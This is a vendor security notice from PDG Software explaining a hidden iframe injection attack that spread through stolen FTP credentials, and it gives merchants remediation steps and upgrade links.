Shopping Cart and ECommerce Software
Solutions from PDG Software, Inc.^®

For the sake of both PDG merchants and others who might be searching for information on this attack, we wanted to provide some information regarding a recent “iframe” hack/attack that has affected some PDG merchants. This attack appears to be a result of local computers that have been compromised by a virus/malware program. The local virus locates stored user id and password information on the local computer and then connects via FTP to the site. Once connected, the program attempts to locate all files that have “index”, “main”, “default” or “home” in the file name (standard file names for most website’s home pages). Once it locates these files, it inserts a hidden iframe on the page so that subsequent visitors to the page are also infected with a virus/malware program.

Unfortunately, some of the PDG Commerce administration templates do have “main” in the file name. Fortunately, though, since PDG Commerce checks the admin templates for unauthorized changes, PDG Commerce refuses to load the template and informs the user that the code within the template has been changed.

When we were first notified of the problem, we assisted one of our customers in confirming via their host’s FTP logs that the files were compromised via an FTP session with “authenticated” access. We have confirmed with several of our hosting partners that this attack appears to be effecting numerous users and does not in any way appear to be specific to PDG Commerce users.

We’ve provided some links below to articles/blogs/alerts that we encountered during the course of our research that detail both how the attacks occurred and what steps users can take to remove the offending malware and prevent the attack from happening again. The general consensus appears to be that a) removing the hidden iframe from all affected pages (hidden <div> that contains the iframe) b) running a full system scan utilizing a current anti-virus software on the offending machine c) changing all user id and password information associated with the hosting account and d) converting to the use of SFTP (secure FTP where all login information and other data sent through connection is encrypted) are the best steps. The most immediate step should be changing your hosting account/FTP log in info, but bear in mind that until the offending program is removed from the local computer, it will continue to access your updated FTP account information and re-infect the files on your server.

http://securitylabs.websense.com/content/Blogs/3422.aspx
http://directadmin.com/forum/showthread.php?p=159176
http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/
http://blog.tigertech.net/posts/ftp-virus-spreading/
http://www.spamfighter.com/News-12579-Security-Experts-Identify-Causes-Of-Gumblar-Attack.htm
And even a post from one of our competitor’s forums… http://www.magentocommerce.com/boards/viewthread/41070/

Users may download the most recent AdminTemplates and CommConfig directories from the PDG Software website at http://download.pdgsoft.com/download/PDG_Commerce/Upgrade/ . Once you have located the correct download for your server’s operating system, you can proceed with upgrading your PDG Commerce installation. The upgrade process will restore all PDG files that might have been affected by the iframe attack. It is important to note, though, that you will also need to check any and all non-PDG related files to confirm that the program did not inject itself into other files located on your server.